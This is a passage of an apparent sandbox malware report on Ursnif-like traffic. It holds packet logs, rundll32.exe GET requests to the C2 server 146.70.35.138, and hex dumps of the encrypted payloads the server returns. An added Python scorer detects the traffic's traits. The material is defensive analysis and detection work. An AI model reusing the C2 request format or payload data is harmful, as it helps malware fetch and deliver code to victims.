                                        Apr 22, 2022 18:13:05.237824917 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238147974 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238188028 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238202095 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238312960 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238327026 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238668919 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.238759041 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238778114 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238800049 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238831043 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.238847971 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238854885 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.238881111 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238888979 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.238892078 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238909960 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238914967 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.238951921 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.238976002 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.238990068 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.239012957 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.239213943 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.239250898 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.239253998 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.239270926 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.239288092 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.239394903 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.239419937 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.239434958 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.239451885 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.239458084 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.239681005 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.239698887 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.239711046 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.239723921 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.239748955 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.239753962 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.239784002 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.383399010 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:05.407381058 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.762598991 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.762626886 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:05.762712002 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:14:07.096249104 CEST4977380192.168.2.5146.70.35.138
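The three GET requests that rundll32.exe sent to 146.70.35.138 in this report's HTTP session share a shape worth scoring in a proxy or sandbox pipeline: a very deep path of random-looking segments under /phpadmin/ that contains '_2B' and '_2F' tokens and ends in '.src', a hard-coded "MSIE 8.0; Windows NT 10.0" User-Agent (Internet Explorer 8 never shipped on Windows 10), no Accept header, and an application/octet-stream reply whose first bytes are not a PE header and whose Content-Disposition filename is 13 lower-case hex characters. That filename shape matches PHP's uniqid(), whose first eight hex digits are the epoch seconds; decoding 6262d40f gives 16:13:03 UTC on 22 Apr 2022, the reply's own Date header, which is consistent with the server minting each download on the fly. The scorer below is an added example, not Joe Sandbox code or the malware's: the trait names, the threshold of 3, the uniqid() reading of the filename, and the benign request used for contrast are all ours; it only scores the visible shape and does not attempt to decode the path, which this page gives no key for.

```python
import re
from email.utils import mktime_tz, parsedate_tz

# Values observed in this report's session with 146.70.35.138; the names are ours.
URSNIF_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"
PATH_TOKEN_RE = re.compile(r"_2[BF]")                       # '_2B' / '_2F' inside path segments
UNIQID_RE = re.compile(r'filename="([0-9a-f]{13})\.bin"')   # 13 lower-hex chars: PHP uniqid() shape


def parse_http(raw: str):
    """Split a raw HTTP/1.x message into its start line and a lower-cased header dict."""
    lines = raw.strip("\r\n").splitlines()
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def score_request(raw: str) -> list:
    """List the ISFB-style traits a request shows; an empty list means nothing stood out."""
    start, headers = parse_http(raw)
    method, path, _version = start.split(" ", 2)
    segments = [s for s in path.split("/") if s]
    reasons = []
    if method == "GET" and len(segments) >= 8:
        reasons.append("deep random-looking path (%d segments)" % len(segments))
    if PATH_TOKEN_RE.search(path):
        reasons.append("_2B/_2F tokens inside the path")
    if path.endswith(".src"):
        reasons.append(".src extension on a binary download")
    if headers.get("user-agent") == URSNIF_UA:
        reasons.append("MSIE 8.0 on Windows NT 10.0 User-Agent (no real IE reports that)")
    if "accept" not in headers and headers.get("cache-control") == "no-cache":
        reasons.append("no Accept header plus Cache-Control: no-cache")
    return reasons


def filename_epoch(headers: dict):
    """Epoch seconds hidden in a uniqid()-style Content-Disposition filename, or None.
    Assumption: PHP uniqid() output, whose first 8 hex digits are the current time."""
    m = UNIQID_RE.search(headers.get("content-disposition", ""))
    return int(m.group(1)[:8], 16) if m else None


def score_response(raw: str, first_bytes: bytes) -> list:
    """Traits of the reply: opaque octet-stream that is not a PE, minted per request."""
    _start, headers = parse_http(raw)
    reasons = []
    if headers.get("content-type") == "application/octet-stream" and not first_bytes.startswith(b"MZ"):
        reasons.append("octet-stream body without MZ header (encrypted or packed blob)")
    epoch = filename_epoch(headers)
    if epoch is not None and "date" in headers:
        served = mktime_tz(parsedate_tz(headers["date"]))   # Date header as UTC epoch
        if abs(served - epoch) <= 5:
            reasons.append("uniqid()-style filename whose timestamp equals the Date header")
    return reasons


def classify(request_raw: str, response_raw: str, first_bytes: bytes, threshold: int = 3):
    """Verdict plus the traits behind it; the threshold keeps one odd trait from alerting."""
    reasons = score_request(request_raw) + score_response(response_raw, first_bytes)
    return ("ursnif-like" if len(reasons) >= threshold else "benign"), reasons


# First request/response pair of the captured session, copied from the report (only the
# first bytes of the 185492-byte body are reproduced).
C2_REQUEST = (
    "GET /phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/"
    "9MB0W4d74KUWgvy/T9aFyptbRYDL9zzFFE/ey_2BT1JO/lSrTwjIXOahrvF9aSR6L/b9k1smqrQnVIlnliRgv/"
    "2ypsvB4cw7AtggmD2zEUH4/HQdlQahm_2BQO/aEvL9exV/IPSvc1E0OTLBBBSbKz_2F3u/WIddgbjcxL/"
    "NDBKkpcQJosXhuH1H/Ng78CGJ_2B/i.src HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)\r\n"
    "Host: 146.70.35.138\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
)
C2_RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: Fri, 22 Apr 2022 16:13:03 GMT\r\n"
    "Content-Type: application/octet-stream\r\nContent-Length: 185492\r\n"
    'Content-Disposition: inline; filename="6262d40feaa20.bin"\r\n\r\n'
)
C2_FIRST_BYTES = bytes.fromhex("2cd468ba77fac2de")

# Constructed benign pair for contrast; not taken from the report.
BENIGN_REQUEST = (
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/99.0\r\n"
    "Accept: text/html\r\n\r\n"
)
BENIGN_RESPONSE = "HTTP/1.1 200 OK\r\nDate: Fri, 22 Apr 2022 16:13:03 GMT\r\nContent-Type: text/html\r\n\r\n"

if __name__ == "__main__":
    for name, req, resp, head in [("captured", C2_REQUEST, C2_RESPONSE, C2_FIRST_BYTES),
                                  ("benign", BENIGN_REQUEST, BENIGN_RESPONSE, b"<!doctype html>")]:
        verdict, why = classify(req, resp, head)
        print(name, verdict, *why, sep="\n  ")
```

Run against the captured pair the scorer reports all five request traits plus both response traits; the benign pair reports none. Each trait on its own is weak (deep paths and octet-stream downloads are common), which is why the verdict needs several of them together, and why the User-Agent and filename-timestamp checks, which are specific to this server's behaviour, carry the most weight in practice.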
                                        • 146.70.35.138
                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                         0 | 192.168.2.5 | 49773 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                         Timestamp | kBytes transferred | Direction | Data
                                         Apr 22, 2022 18:13:03.616503954 CEST | 653 | OUT | GET /phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0W4d74KUWgvy/T9aFyptbRYDL9zzFFE/ey_2BT1JO/lSrTwjIXOahrvF9aSR6L/b9k1smqrQnVIlnliRgv/2ypsvB4cw7AtggmD2zEUH4/HQdlQahm_2BQO/aEvL9exV/IPSvc1E0OTLBBBSbKz_2F3u/WIddgbjcxL/NDBKkpcQJosXhuH1H/Ng78CGJ_2B/i.src HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                        Host: 146.70.35.138
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                         Apr 22, 2022 18:13:03.994354963 CEST | 654 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Fri, 22 Apr 2022 16:13:03 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 185492
                                        Connection: keep-alive
                                        Pragma: public
                                        Accept-Ranges: bytes
                                        Expires: 0
                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                        Content-Disposition: inline; filename="6262d40feaa20.bin"
                                        Data Raw: 2c d4 68 ba 77 fa c2 de fe 95 8f 63 f1 45 56 5f 12 44 e4 30 5c f8 d2 eb ea 34 2c 15 08 e7 49 45 b8 f9 96 19 41 71 13 28 e7 22 8f 4d ba 44 b3 a3 6f 7b bf 72 ac b8 4f 7a 8f 60 a9 cb 6c 3d ef 2b e9 4b 6b 0d c8 68 41 c2 6d c2 e3 f9 cf c2 87 b7 ba 24 d1 5f c4 e4 11 7f 1c c7 6e f2 5e f5 c4 ad f7 ba 0b 19 f0 08 a6 0c 8c d6 7a ca 0e d2 e6 b9 3c 29 08 fd f9 f1 34 77 36 0b 69 d0 eb 4a 15 78 00 41 ee 63 8f 39 c4 83 84 54 5b 93 be 4b 41 ed 1d 77 6d c3 05 cd fb 5a 9e 69 00 27 b2 f8 28 22 b7 a6 fc e9 96 12 bf 16 16 9d 0b ee d7 ea 0d 29 ee 79 d6 f3 cc 9f 0b f5 7d b6 d6 9d bb 69 9e 76 c7 39 32 ee d6 d4 08 12 34 be c8 8e fb 1c 3d 89 fc bf 1e 9e 0e d2 b9 e2 14 bf 51 43 7d 58 21 d1 40 02 45 f3 45 af bc 93 a8 36 96 14 02 27 44 48 1d 0b 1f 08 60 72 20 55 8d 5f 3f 8c 71 71 8c e7 54 2b e2 cf f6 8d 2a df b4 82 9c 87 a5 18 0b 6f fb 3f 82 4c 5e aa 5a 08 af 9c 02 00 fb eb 9d d7 2f 90 11 fd 78 12 69 5c e2 38 4c 8c 6d 27 2d 35 3c 88 16 b7 9f 54 8f a5 4e e1 4b ea ff cb 25 a4 42 ea d4 1e 22 32 a7 6b d6 eb b7 2b c0 80 ad 13 44 6c 89 82 1e 7b 2c b0 71 05 65 75 d4 16 90 f9 f6 9e bf 21 86 69 02 07 a7 b5 02 b3 ec 6e 19 59 91 77 0a cd c7 f9 cf d0 06 50 8f db ab 03 f0 2b ed 2c e9 89 4a 88 59 8e 9c 7b de 14 fb 5f 7a df 0b 56 a9 b0 09 ba 19 86 1e 08 0f 71 f0 8e 65 83 4b a6 05 af 86 29 8c 39 c9 e2 36 a1 a4 0b 31 39 3a ee 98 85 08 ef f9 8a c4 bb ec bb 1f 9b 9f f4 c6 01 ad 17 12 ae cc 8a 29 41 89 52 e5 85 3e 09 15 69 93 24 9e f2 0d ae 0e 90 3c 47 2b 74 cd 39 1f dc 18 32 2f e0 00 8c d0 28 0e 13 d1 70 db 15 39 da 20 14 8b e0 b8 1b 3c 02 e0 b2 a5 3c ca fe e7 fb 71 b2 bc 46 2d bc b4 9e 2c 4d 42 51 60 d9 48 e0 73 ba b2 e6 ff cc b8 db 2e e2 47 db bb 09 3a b9 9f 21 fe 77 2e 1d b2 85 0d a1 6a 4b 3e 56 67 a8 28 25 b1 f2 cf ad c9 e6 f4 18 51 6f b6 b0 8a 87 9d fb ce 15 d9 a2 86 b4 13 c6 dd e0 49 26 f1 50 24 7d 04 14 ea d1 2d 24 e9 a6 f4 22 05 98 d9 91 38 e1 02 fb 62 5c 43 30 a0 74 a0 fe 8a 61 5b a4 5f 98 c5 39 06 b3 ff b3 25 3e 04 88 b4 82 83 94 64 a9 84 cb 9f 9f 1f 70 
bf a6 3d 99 30 75 a2 26 ad af ef f7 ba 7e 13 36 dd ec 5b 00 93 21 74 eb 71 3e 31 3f 16 27 12 09 56 f4 b7 72 7d 36 19 03 2a 7c a9 f7 0e db 60 ea 21 0c ac 34 69 0b f0 81 dc 2d 5f e4 a4 b6 24 55 e6 24 ff de 1c d5 e9 18 d3 35 2a 51 65 b0 c5 0f d5 01 1b 9a a0 5e 93 f9 68 c7 00 64 1f 2c 80 f7 41 5f e5 a0 9d 2f c6 86 8f 6f 8b 9d 4c b1 75 fc 20 25 d0 69 a5 8d 42 8d 70 8d 86 c2 f3 67 47 48 b7 50 67 56 93 04 87 a8 94 6f b6 e3 87 a3 b4 4d 82 29 55 55 cc bf 88 0f b6 e6 4e 07 85 85 7b fd 4d fd 55 f7 b8 74 b1 8b 37 53 df fb 4f 98 6d 65 18 3a 85 dd 02 aa 7b f8 75 8a 02 bd 0a 6a 66 4a 19 f0 33 ea 01 93 bf 2a 36 65 f8 7e ef 26 c4 af a9 2e 18 c8 ed b3 86 8f 46 e9 a7 e4 ec 13 e5 6d 9b c1 09 49 cc 98 5f b5 0a 69 9d 1c e3 cc c3 38 81 ac 51 37 ad b2 6c 2f 7d 59 19 40 d7 7e f1 53 45 02 45 53 44 6c 2d 0d c7 9a 76 0c 41 e9 e0 e3 e8 77 65 0c 72 10 fe 62 87 ff 9f c1 11 34 4f a6 32 7d 9d 57 30 b5 40 b5 bb f8 5b 1b 7b 6f 92 b8 55 ce df 06 0e ce dd 7e ac 10 7e fd 5b dd 43 a7 d8 02 48 aa 68 37 27 8b 94 13 39 6a 48 27 0b 97 37 5f 35 45 41 33 2d 34 0a
                                        Data Ascii: ,hwcEV_D0\4,IEAq("MDo{rOz`l=+KkhAm$_n^z<)4w6iJxAc9T[KAwmZi'(")y}iv924=QC}X!@EE6'DH`r U_?qqT+*o?L^Z/xi\8Lm'-5<TNK%B"2k+Dl{,qeu!inYwP+,JY{_zVqeK)9619:)AR>i$<G+t92/(p9 <<qF-,MBQ`Hs.G:!w.jK>Vg(%QoI&P$}-$"8b\C0ta[_9%>dp=0u&~6[!tq>1?'Vr}6*|`!4i-_$U$5*Qe^hd,A_/oLu %iBpgGHPgVoM)UUN{MUt7SOme:{ujfJ3*6e~&.FmI_i8Q7l/}Y@~SEESDl-vAwerb4O2}W0@[{oU~~[CHh7'9jH'7_5EA3-4
                                         Apr 22, 2022 18:13:03.994388103 CEST | 655 | IN | Data Raw: 99 10 85 d7 1c 36 c0 22 ad c0 17 04 e7 d3 51 71 d3 71 24 6b 45 10 29 ad 03 0b 02 01 45 c4 ab 56 6a f7 03 ce 9d fc 36 9f 85 a2 31 5f 0d d6 6f 5a ec 99 18 9c 24 ce 53 b8 da 14 8e 41 1d 91 bf 2c c5 fb 1a 56 3b 1b 0b f1 9f c1 36 cc 1b a4 06 c6 7a 6b
                                        Data Ascii: 6"Qqq$kE)EVj61_oZ$SA,V;6zkv,O`~b.`3And/HH6/4l-#q*&inEf-Yx[?@8efjUr=e^>kVVG)Hz#shtEsl)
                                         Apr 22, 2022 18:13:03.994417906 CEST | 657 | IN | Data Raw: 1b c9 fe f8 47 fb 52 9b 80 32 24 7b 2d 18 cb 6c 0a 3a b7 e1 ff 5f 83 97 96 a5 35 d8 f7 5e a7 79 ea b3 a1 2f 09 24 81 c3 1b 1e 99 b1 3b 2d 0f 09 98 85 62 dd 7f f9 f9 70 57 67 9d 78 9f f9 ac 13 77 74 cc 43 fd 65 c1 c6 c1 56 79 23 b7 4a 81 e1 41 d0
                                        Data Ascii: GR2${-l:_5^y/$;-bpWgxwtCeVy#JA Vx|R+n+eN(S;4)s.GP`!DCNN>?R$3P$zVfw;}6@|)qW'a]Wx~$=c
                                         Apr 22, 2022 18:13:03.994436026 CEST | 658 | IN | Data Raw: 9d 8c 0f 29 e5 7d 63 0a 47 79 84 ab f5 f0 d6 c4 2e 40 df eb 8c e8 d1 cd 25 f4 39 de 92 3c 2e c3 ba 68 fb aa db 11 cc 83 9a cc 82 f3 08 e6 66 80 66 f6 92 6b 98 98 ad d8 b4 9f c9 bd 34 3e 60 b8 ae 98 a9 a3 db 3d 17 5b 68 03 62 38 59 22 16 59 3c 73
                                        Data Ascii: )}cGy.@%9<.hffk4>`=[hb8Y"Y<s0)e:W*kP;e1tPuL76a7I=%?r|QMoEr9_#sm>s_\C_zz8#-"C<1qQi!x[nYUz]X&\f
                                         Apr 22, 2022 18:13:03.994559050 CEST | 660 | IN | Data Raw: a3 98 5a d2 94 4f 6f 88 7b 3c 06 aa e1 bd 17 09 5d 19 3f 04 53 48 0f f7 44 12 25 75 27 c2 60 11 1d cb 77 fe 3e cd 5d 0a 26 c8 d5 c3 87 9b 28 54 56 36 1e a0 92 76 90 8c 6b d0 50 44 e9 fc b5 0a e2 60 71 ae ab 48 1e 82 82 1e 8f 7d 9f c4 96 12 46 39
                                        Data Ascii: ZOo{<]?SHD%u'`w>]&(TV6vkPD`qH}F9WZCk(`:_,n=D(p[0%r)4"F1@(WtDZn'M'#Azl|47r|)u5DPfh|*{9Plu1XX
                                         Apr 22, 2022 18:13:03.994689941 CEST | 661 | IN | Data Raw: 0c 0f 24 67 57 7e 5f 76 36 98 51 a8 14 f1 c9 e3 f7 a2 6e 23 41 07 5a 7f ee 5a 4e ec 41 10 0f 56 8a 7c 52 fb f9 73 55 03 0f 28 5d 2e 32 56 5b 25 f5 6e 70 c1 25 e2 eb 80 be 71 11 d0 72 3f 5b 0a ec a8 57 df 2f ac 65 51 5f 86 d8 41 af 08 88 c3 92 1d
                                        Data Ascii: $gW~_v6Qn#AZZNAV|RsU(].2V[%np%qr?[W/eQ_A[C4Rhr3~4!zc)CQp:iLHIJC9gqM`d$!V@?!^#u9e=KrldHQ,=C~vB.W
                                         Apr 22, 2022 18:13:03.994818926 CEST | 663 | IN | Data Raw: db 8f 61 c6 68 2b d1 8f 14 b3 9c c8 2c 73 0d 84 d3 ad 26 b4 a9 38 97 60 49 96 1f 0a 6b 6f ec 37 71 04 a4 ed 9b e2 ed 27 0d f6 c8 90 4d f2 d9 7d 92 df 49 1c 78 b6 95 04 24 d0 9e 5d 89 27 7f 93 1e 2b 16 4b 2e 88 3a 65 06 1d 51 f3 bc 5c b5 61 03 88
                                        Data Ascii: ah+,s&8`Iko7q'M}Ix$]'+K.:eQ\aw,4^?9h#JXfM{Lgn B=:\pcE,i(>N0qLK5%+Dn(1sD132v/.-w>`9KU=
                                         Apr 22, 2022 18:13:03.994837046 CEST | 664 | IN | Data Raw: 68 cc 48 a4 b8 01 93 96 94 d1 09 8e 46 56 4f 7e 5d d0 98 21 3e 75 28 54 6c d7 0f 3f 71 8c e3 f8 79 70 3c b0 ee a0 ff a3 09 9c f8 2f 15 db 96 6d 62 6e bb b2 21 0b 61 4e 91 00 ff 3f 25 aa 37 5c 6b 2e b7 a2 f8 96 f9 54 36 23 c7 68 4f 98 1b 86 2b 3a
                                        Data Ascii: hHFVO~]!>u(Tl?qyp</mbn!aN?%7\k.T6#hO+:w_B&]JPAA^<rSO%|6oer})QKJ{Rg5xJX]\ED{X0-$#8W:VYcB$UdF^
                                         Apr 22, 2022 18:13:03.994941950 CEST | 666 | IN | Data Raw: 05 af 19 43 58 fd 46 c6 67 41 2e 59 62 82 02 4d 43 e3 3f 15 01 9b ba a4 18 e3 8b 78 fa 5c b7 19 fd c6 fb 05 28 ea f8 6a d4 99 20 db f8 2e f4 60 3b 54 1a 1d 3c 8e 05 cf 9d 9b 0e 7a 8d a4 f6 96 dd ae e3 e5 13 88 06 6d cf 84 93 13 1c 43 7a eb 41 48
                                        Data Ascii: CXFgA.YbMC?x\(j .`;T<zmCzAHbvz0+{T&+KHfo(wj`$=;\S2H7WTA8sQ~u%A9RZqvgp2!iRI\aj anD
                                         Apr 22, 2022 18:13:03.995069981 CEST | 666 | IN | Data Raw: 1a 44 e7 2a f5 4d d8 7a 2e 62 9d e8 d7 19 b9 b6 4b b6 5e 74 5b 78 3d d0 f7 50 93 da 7c 11 6d 8e dc f5 13 67 82 48 2b b7 d3 30 17 82 ea c8 3f 45 54 df 55 59 34 db 4f 01 16 ea fa a4 f0 1c 38 03 77 56 14 a2 88 08 df 60 da 4b 51 9e f0 0f 5a 0c 35 fd
                                        Data Ascii: D*Mz.bK^t[x=P|mgH+0?ETUY4O8wV`KQZ5,#]J0aivK!Gr\%:QPY-j'qvy2BDPs7/U@u[Md&%^O&9_WU=}eB2&RK!
                                         Apr 22, 2022 18:13:04.034974098 CEST | 667 | IN | Data Raw: be 79 f4 7a ed 76 9e e8 f5 2f b5 43 e1 f7 a9 0b 51 a6 1f a5 32 b1 8a 63 d4 02 96 8e 03 19 7f 26 a0 e7 1f 13 84 9c ed 61 e6 27 c9 b9 69 78 07 27 4c 09 a1 e7 73 7e 11 d7 29 74 d8 81 b8 90 3c 74 a2 5f 06 ac 64 35 a5 ad ff 62 bc d8 03 1b 0d 06 c1 d2
                                        Data Ascii: yzv/CQ2c&a'ix'Ls~)t<t_d5b~,6(ZuCVJn22gxIPLk;B-<C >$X~[*ai /FFk*+KT%*t'.R *uJw8
                                         Apr 22, 2022 18:13:04.407179117 CEST | 852 | OUT | GET /phpadmin/rImI92vjvUNrdqYhehfuQ/EzgCy9SUEjz2FceM/AZUBVoSihd3oytF/iNtO1XKcgiKIaSZikS/u68wld8v7/JzQJUDKg4_2FHKvnf_2F/gYZGX_2BFqw2fP1CIUg/LkSLAUfxVpj9UOLBiN4SzM/3p_2FST_2BWxB/bEkLoFXP/JI38DjkOM8fg69zOOdXCrW3/ft8HZYP438/0Zqpj_2F45Rs54Oh9/T9vyzwf7yRUW/99MF_2BHC7D/O7af6TuFb/aLreGz.src HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                        Host: 146.70.35.138
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                         Apr 22, 2022 18:13:04.795639992 CEST | 853 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Fri, 22 Apr 2022 16:13:04 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 237210
                                        Connection: keep-alive
                                        Pragma: public
                                        Accept-Ranges: bytes
                                        Expires: 0
                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                        Content-Disposition: inline; filename="6262d410ba03f.bin"
                                        Data Raw: c5 94 a1 d4 cf 01 54 ad 67 b8 35 ce fb a5 32 f4 b8 b7 20 18 bc af a0 b9 ec 7b fb 86 8b 40 5e 0c 4a 06 ae 62 ba 7e a8 0e 1b 4e 14 4a 61 22 66 60 c1 90 c2 5a 82 32 07 b5 0a 28 8e 7e ea 85 17 e2 57 83 3e 40 70 7a c8 68 8c 7d d1 83 2a 85 e7 64 0d ab 77 92 0b f8 d4 ae aa 6d 4c 70 33 cb 56 58 74 22 20 f5 7b 99 7b 0e 65 8e 51 07 ac ce 98 00 ec e4 f0 89 47 50 b4 65 b8 e6 23 43 ea 16 0d b5 8e 48 c9 d4 b9 c9 0f 48 2b 92 f5 d9 19 96 9f b7 32 8f 57 f8 3a 9c fc 78 1d 08 05 6b ca 6b 56 e1 08 8a 76 14 44 72 99 2e 7d 22 b0 6c 29 5b 8c 06 be c3 af d8 ef ff 64 73 b5 62 45 13 3e b1 99 c6 c3 60 ae 9b 3e dd 20 19 6a a3 cd 7a 59 d5 b4 c1 aa a6 dc 4b 26 e5 4e 0a ac 02 9b 15 7a 9d 51 f7 1e e8 c4 41 6e b0 8e ff d2 ab 95 a3 8f 5b f5 e4 4b 8d 05 c5 21 c3 0d 04 92 f1 83 5d d6 cd 19 d6 95 ef 7a 20 dc 91 10 4b 51 4d c4 2f 7e 03 c5 fb c7 08 d6 e6 74 2d 56 44 d8 a7 57 e5 91 1a 81 81 28 8e 88 63 7a 12 47 80 4d 99 4c 72 45 22 50 02 d6 85 c2 6c fd db 8c 27 af ef 7c 2f 5d 7c 0b e5 88 33 be dd 60 30 74 74 8c a3 06 b9 ed d1 2c 46 b0 e9 a1 97 b3 ea 80 a0 99 6b 07 3c 37 c9 12 1f ca d9 c3 f6 bb 95 dd 15 23 53 41 27 6f f3 b7 88 01 8a d4 d8 80 fd 64 fa 32 a6 51 db 9f c7 ee e4 2d 78 68 27 22 5a e0 e3 ba 67 38 ba 44 d8 c0 55 c4 ec 9a 89 db f1 e0 2e d2 f7 a6 dc 66 3e 69 cc e8 de eb f3 85 39 5d 45 7f b9 f1 d9 92 47 72 e8 1c dc 16 5f 94 8a 34 c6 6c c7 7f bf 51 e6 91 79 6b ec b5 f2 72 8a 6e b3 d4 29 d2 4a 3d 65 71 97 ed a8 79 9f fb cb 30 cc fd 81 1c 66 39 8a b5 b5 5f 2c dd e5 5b 58 45 3b 5a 92 5c 70 43 7f 69 e1 9b 6d 7f db ab 8b d9 4b ae 21 5f 89 c8 75 0c 23 18 67 b6 b0 86 9b cc 76 18 15 a9 b3 09 79 d9 aa 99 d5 8b c9 51 00 53 c1 31 2b cd 41 d0 8a 96 d9 92 f2 7f 67 79 25 7f e2 62 ad 75 e8 be a6 7a 01 eb 0c f3 5a 4c 9f 68 d1 7f e9 9e 7f 08 a9 1c 84 4b b7 f0 66 31 a6 2b 57 22 e5 0e 43 be b8 fc 02 48 c9 d3 b8 1c e9 cc 51 f3 27 a8 b6 0c 56 89 f3 0e 39 c0 70 63 51 a6 e5 fc 29 3c a8 0f ec 59 d0 f4 34 c5 27 e7 61 7b 18 d0 12 e9 ab 44 40 e0 f6 7f 5e 83 98 d8 bc 67 ce ce 0f 
e5 1f 97 a0 21 8a 8e bc 55 43 ed 76 28 e5 0b 47 e0 f3 ff d0 21 b2 bc 73 a8 04 22 a6 ff 80 9f 8f 27 4d 47 a6 c6 82 70 1a 05 2d e6 88 42 ba 6d eb 81 16 9c c2 93 e2 65 77 90 f6 1e fa 29 11 df 98 6b fa 90 d3 03 e2 3a e4 ea 7c 50 f4 57 34 74 0a ea 2a 2c c1 b6 1b 90 45 b5 a5 5d c8 a3 e5 2d c5 1b 47 36 e5 5e 5c ff 60 5b 86 7b 3a 3b 37 57 9d 83 86 72 e8 ac ff 51 7d 5b 56 f9 58 9b fc bd c3 ae 7f 17 f4 86 5d ac bf 83 30 cc a8 ac 1b 10 85 b4 67 38 3f 05 02 4b 10 c3 bc 6d cc 98 fe aa 9d fd 82 48 09 5f 6d c5 24 98 bc 1e 8d d0 32 3a be ba 5b cc 59 71 10 19 db f1 27 b4 18 19 51 81 c9 dc 2a 68 da d5 ca 34 87 4e 78 63 94 78 3a e6 ce 53 d9 88 10 f3 a7 80 63 78 a7 38 76 d7 18 61 67 78 00 29 51 09 8f 4c 89 4b ca 92 9c 13 7e 59 39 a0 51 aa fa d1 03 3b 4a 5f 67 d0 85 63 ea 30 6f 0d e8 09 ae 34 e7 8a 90 d9 95 4b fd 26 05 fb 0e 7c 02 b0 0c f9 67 df 98 0f 79 8c 6d ff 0c e7 be 6a b7 12 29 4d 0b 62 99 8f 98 67 62 02 8d b2 49 94 fa b5 be b0 ec 6a 9a af d8 30 7c aa 3f 85 d3 66 54 02 99 b6 98 bd be ce 73 8d 03 3f fe 89 4f 99 33 c1 d3 c5 bf fa 8b fb
